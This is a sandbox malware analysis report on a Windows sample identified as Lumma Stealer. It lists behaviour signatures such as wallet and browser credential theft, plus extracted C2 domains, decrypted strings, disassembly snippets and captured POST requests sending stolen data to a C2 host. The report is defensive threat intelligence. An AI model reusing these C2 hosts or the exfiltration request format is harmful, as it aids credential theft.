Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
7Y18r(97).exe

Overview

General Information

Sample name:7Y18r(97).exe
Analysis ID:1480528
MD5:cdc633170ad40f573d38afef8a18f53f
SHA1:7613f84e8daaa2e09f8cdd237bc1d5c9edd23839
SHA256:6e787abd345af6092e3b22f603f4c32eb667e45c911219d2092ef6664b8b3efa
Tags:exe
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 7Y18r(97).exe (PID: 7724 cmdline: "C:\Users\user\Desktop\7Y18r(97).exe" MD5: CDC633170AD40F573D38AFEF8A18F53F)
    • WerFault.exe (PID: 8132 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7724 -s 1680 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["conformfucdioz.shop", "bindceasdiwozx.shop", "contemplateodszsv.shop", "arriveoxpzxo.shop", "catchddkxozvp.shop", "declaredczxi.shop", "replacedoxcjzp.shop", "applyzxcksdia.shop", "closedjuruwk.shop", "conformfucdioz.shop", "bindceasdiwozx.shop", "contemplateodszsv.shop", "arriveoxpzxo.shop", "catchddkxozvp.shop", "declaredczxi.shop", "replacedoxcjzp.shop", "applyzxcksdia.shop", "closedjuruwk.shop", "conformfucdioz.shop", "bindceasdiwozx.shop", "contemplateodszsv.shop", "arriveoxpzxo.shop", "catchddkxozvp.shop", "declaredczxi.shop", "replacedoxcjzp.shop", "applyzxcksdia.shop", "closedjuruwk.shop"], "Build id": "UTE6eY--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1606925464.00000000008AB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x4de8c:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000003.1640181429.00000000008B5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: 7Y18r(97).exe PID: 7724JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: 7Y18r(97).exe PID: 7724JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            No Snort rule has matched

            Suricata Signatures

            Timestamp:2024-07-24T21:02:11.193926+0200
            SID:2048094
            Source Port:49713
            Destination Port:443
            Protocol:TCP
            Classtype:Malware Command and Control Activity Detected
            Timestamp:2024-07-24T21:02:08.812047+0200
            SID:2054653
            Source Port:49708
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-07-24T21:02:09.799712+0200
            SID:2054653
            Source Port:49711
            Destination Port:443
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: declaredczxi.shopAvira URL Cloud: Label: malware
            Source: applyzxcksdia.shopAvira URL Cloud: Label: malware
            Source: https://closedjuruwk.shop/apiAvira URL Cloud: Label: malware
            Source: bindceasdiwozx.shopAvira URL Cloud: Label: malware
            Source: https://closedjuruwk.shop:443/apiAvira URL Cloud: Label: malware
            Source: conformfucdioz.shopAvira URL Cloud: Label: malware
            Source: catchddkxozvp.shopAvira URL Cloud: Label: malware
            Source: replacedoxcjzp.shopAvira URL Cloud: Label: malware
            Source: contemplateodszsv.shopAvira URL Cloud: Label: malware
            Source: https://closedjuruwk.shop/api?Avira URL Cloud: Label: malware
            Found malware configuration
            Source: 7Y18r(97).exe.7724.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["conformfucdioz.shop", "bindceasdiwozx.shop", "contemplateodszsv.shop", "arriveoxpzxo.shop", "catchddkxozvp.shop", "declaredczxi.shop", "replacedoxcjzp.shop", "applyzxcksdia.shop", "closedjuruwk.shop", "conformfucdioz.shop", "bindceasdiwozx.shop", "contemplateodszsv.shop", "arriveoxpzxo.shop", "catchddkxozvp.shop", "declaredczxi.shop", "replacedoxcjzp.shop", "applyzxcksdia.shop", "closedjuruwk.shop", "conformfucdioz.shop", "bindceasdiwozx.shop", "contemplateodszsv.shop", "arriveoxpzxo.shop", "catchddkxozvp.shop", "declaredczxi.shop", "replacedoxcjzp.shop", "applyzxcksdia.shop", "closedjuruwk.shop"], "Build id": "UTE6eY--"}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: conformfucdioz.shop
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: bindceasdiwozx.shop
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: contemplateodszsv.shop
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: arriveoxpzxo.shop
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: catchddkxozvp.shop
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: declaredczxi.shop
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: replacedoxcjzp.shop
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: applyzxcksdia.shop
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: closedjuruwk.shop
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmpString decryptor: UTE6eY--
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 0_2_02AC7A10 CryptUnprotectData,0_2_02AC7A10
            Source: 7Y18r(97).exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49713 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49717 version: TLS 1.2
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then movzx ecx, word ptr [esi+eax]0_2_025A826F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ecx, dword ptr [esi+1Ch]0_2_0259A262
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov al, 01h0_2_025AC265
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then inc ebx0_2_0258820F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_0258722A
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then jmp ecx0_2_025AD375
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h0_2_0258F36F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h0_2_02595314
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_025AA3DF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov word ptr [ecx], ax0_2_025873D0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edi, eax0_2_02585386
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [00444970h]0_2_02596094
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0259814F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_025AC16E
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0259814F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+50h]0_2_0259B1B6
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+50h]0_2_0259B1A7
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_025A374F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_02586701
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp byte ptr [ebx+edi+01h], 00000000h0_2_02586701
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h0_2_0258A73F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 11081610h0_2_0258778D
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+00000820h]0_2_0259902D
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edx, dword ptr [esp]0_2_025AB7AC
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_0258D47F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_0258D47F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ebx, eax0_2_0257542F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+08h]0_2_02583496
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then movzx edx, word ptr [ebx+eax*4]0_2_0257A4BF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ecx, dword ptr [esp]0_2_0257A4BF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then jmp ecx0_2_025894B5
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then jmp eax0_2_025904B4
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_025755DF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov word ptr [edx], 0000h0_2_025855CF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+00000820h]0_2_025995E3
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+00000820h]0_2_025995E6
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]0_2_02588A56
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then jmp eax0_2_02584ADB
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_0257BB5F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then push eax0_2_025A5B23
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 00D23749h0_2_0258FBFB
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edx, dword ptr [esp+30h]0_2_0258180F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edx, dword ptr [esp+00000200h]0_2_0258180F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h0_2_025838B1
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edi, eax0_2_025AD8B6
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esp+70h]0_2_0258994A
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+10h]0_2_02585945
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then jmp ecx0_2_0259A972
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_0257492F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ecx, dword ptr [esp]0_2_025A99DF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then jmp eax0_2_025AD9AB
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h0_2_02589E2A
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_02586EF5
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_0258CEBF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edx, dword ptr [esi+08h]0_2_02585FEA
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ecx, dword ptr [esp+54h]0_2_02588FB8
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_0257FFAF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+10h]0_2_02584C55
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h0_2_02584C55
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h0_2_02596CB1
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [00444A9Ch]0_2_02596CB1
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edx, dword ptr [esp+000000B0h]0_2_02594D7C
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then lea ebp, dword ptr [esp+03h]0_2_02597D6F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ecx, dword ptr [esp+50h]0_2_0258AD1F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_02586D86
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]0_2_02574DBF
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]0_2_02AB3260
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ecx, dword ptr [esp+50h]0_2_02AC91C0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ecx, dword ptr [esp]0_2_02AE7E80
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ecx, dword ptr [esp+10h]0_2_02AC6EF8
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then push eax0_2_02AE3FC4
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edx, dword ptr [esp+30h]0_2_02ABFCB0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edx, dword ptr [esp+00000200h]0_2_02ABFCB0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esp+70h]0_2_02AC7DEB
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h0_2_02AC82CB
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp byte ptr [ebx], 00000000h0_2_02AC522D
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edx, dword ptr [esp+000000B0h]0_2_02AD321E
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then lea ebp, dword ptr [esp+03h]0_2_02AD6210
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_02AC5396
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_02ACB360
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 00D23749h0_2_02ACE09C
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+10h]0_2_02AC30F6
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h0_2_02AC30F6
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_02ABA000
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp dword ptr [eax+edi*8], 11081610h0_2_02AD5152
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [02AF4A9Ch]0_2_02AD5152
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then inc ebx0_2_02AC66B0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_02AC56CB
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_02AEA60F
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_02AD65F0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+50h]0_2_02AD9648
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+50h]0_2_02AD9657
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h0_2_02AD37B6
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov al, 01h0_2_02AEA706
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ecx, dword ptr [esi+1Ch]0_2_02AD8703
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then movzx ecx, word ptr [esi+eax]0_2_02AE6710
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edx, dword ptr [esi+08h]0_2_02AC448B
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ecx, dword ptr [esp+54h]0_2_02AC7459
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_02ABE450
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_02AD65F0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [02AF4970h]0_2_02AD453C
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+00000820h]0_2_02AD7A84
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+00000820h]0_2_02AD7A87
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_02AB3A80
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov word ptr [edx], 0000h0_2_02AC3A70
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+04h]0_2_02AC4BA2
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp byte ptr [ebx+edi+01h], 00000000h0_2_02AC4BA2
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp word ptr [esi+eax+02h], 0000h0_2_02AC8BE0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_02AE1BF0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esp]0_2_02AE8880
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ebx, eax0_2_02AB38D0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edi, eax0_2_02AC3827
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then jmp ecx0_2_02AEB816
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h0_2_02ACD810
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov word ptr [ecx], ax0_2_02AC5871
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h0_2_02ACB920
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esp+04h]0_2_02ACB920
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+08h]0_2_02AC1937
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then movzx edx, word ptr [ebx+eax*4]0_2_02AB8960
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov ecx, dword ptr [esp]0_2_02AB8960
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then jmp eax0_2_02ACE955
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then jmp ecx0_2_02AD8E13
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then jmp eax0_2_02AEBE4C
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then jmp eax0_2_02AC2F7D
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 11081610h0_2_02AC5C2E
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edx, dword ptr [esp]0_2_02AE9C4D
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+00000820h]0_2_02AD74CE
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov eax, dword ptr [esi+10h]0_2_02AC3DE6
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_02AB2DD0
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then mov edi, eax0_2_02AEBD57
            Source: C:\Users\user\Desktop\7Y18r(97).exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h0_2_02AC1D52

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: conformfucdioz.shop
            Source: Malware configuration extractorURLs: bindceasdiwozx.shop
            Source: Malware configuration extractorURLs: contemplateodszsv.shop
            Source: Malware configuration extractorURLs: arriveoxpzxo.shop
            Source: Malware configuration extractorURLs: catchddkxozvp.shop
            Source: Malware configuration extractorURLs: declaredczxi.shop
            Source: Malware configuration extractorURLs: replacedoxcjzp.shop
            Source: Malware configuration extractorURLs: applyzxcksdia.shop
            Source: Malware configuration extractorURLs: closedjuruwk.shop
            Source: Malware configuration extractorURLs: conformfucdioz.shop
            Source: Malware configuration extractorURLs: bindceasdiwozx.shop
            Source: Malware configuration extractorURLs: contemplateodszsv.shop
            Source: Malware configuration extractorURLs: arriveoxpzxo.shop
            Source: Malware configuration extractorURLs: catchddkxozvp.shop
            Source: Malware configuration extractorURLs: declaredczxi.shop
            Source: Malware configuration extractorURLs: replacedoxcjzp.shop
            Source: Malware configuration extractorURLs: applyzxcksdia.shop
            Source: Malware configuration extractorURLs: closedjuruwk.shop
            Source: Malware configuration extractorURLs: conformfucdioz.shop
            Source: Malware configuration extractorURLs: bindceasdiwozx.shop
            Source: Malware configuration extractorURLs: contemplateodszsv.shop
            Source: Malware configuration extractorURLs: arriveoxpzxo.shop
            Source: Malware configuration extractorURLs: catchddkxozvp.shop
            Source: Malware configuration extractorURLs: declaredczxi.shop
            Source: Malware configuration extractorURLs: replacedoxcjzp.shop
            Source: Malware configuration extractorURLs: applyzxcksdia.shop
            Source: Malware configuration extractorURLs: closedjuruwk.shop
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: closedjuruwk.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: closedjuruwk.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: closedjuruwk.shop
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15070Host: closedjuruwk.shop
